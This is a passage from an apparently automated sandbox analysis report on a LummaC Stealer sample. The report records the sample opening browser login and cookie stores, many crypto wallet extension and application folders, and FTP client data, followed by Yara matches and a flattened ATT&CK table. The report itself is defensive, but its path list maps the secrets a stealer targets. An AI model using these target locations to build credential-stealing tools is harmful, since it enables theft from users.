                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
                          Source: Yara matchFile source: 00000003.00000003.2082382204.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5780, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5780, type: MEMORYSTR
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.2760000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.R3nz_Loader.exe.6cf01000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.R3nz_Loader.exe.6cf01000.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.R3nz_Loader.exe.6cee0000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.R3nz_Loader.exe.a10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		1
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		21
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts2
                          Command and Scripting Interpreter                          		Boot or Logon Initialization Scripts311
                          Process Injection                          		11
                          Deobfuscate/Decode Files or Information                          		LSASS Memory11
                          File and Directory Discovery                          		Remote Desktop Protocol41
                          Data from Local System                          		2
                          Non-Application Layer Protocol                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          PowerShell                          		Logon Script (Windows)Logon Script (Windows)4
                          Obfuscated Files or Information                          		Security Account Manager33
                          System Information Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		113
                          Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                          Software Packing                          		NTDS251
                          Security Software Discovery                          		Distributed Component Object Model3
